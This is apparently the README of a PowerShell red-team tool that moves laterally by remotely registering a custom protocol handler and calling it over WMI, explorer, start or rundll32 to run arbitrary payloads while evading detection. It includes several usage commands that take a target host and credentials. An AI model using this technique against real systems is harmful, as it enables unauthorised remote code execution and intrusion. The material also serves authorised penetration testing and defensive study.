lateral movement techniques that can be used during red team exercises.
This technique is registering a protocol handler remotely and invoke it to execute arbitrary code on the remote host. The idea is to simply invoke start handler:// to execute commands and evade detection.
This cmdlet create a protocol handler that will call your payload. Then execute it over WMI using explorer.exe.
the command that will be execute will look like the following one:
cmd.exe /c start ms-browser://
Where ms-browser is the custom handler you registered and will execute the payload you specified.
The default handler name is ms-browser but it can be set with the -Handler switch
The handler can also be executed through rundll32 using the following command rundll32 url.dll,FileProtocolHandler
Usage:
module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run"
module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name
module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password
module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password -UseRunDLL32 True
module-import .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password -RemoteCommand "custom command to run the handler"
The -RemoteCommand switch can be used to specify the remote command used. the handler name will be appended at the end automatically.
- rundll32 url.dll,FileProtocolHandler
- rundll32 url.dll,OpenURL
- explorer
- start
- add more way to execute the protocol handler
Mr.Un1k0d3r RingZer0 Team
Tazz0 RingZer0 Team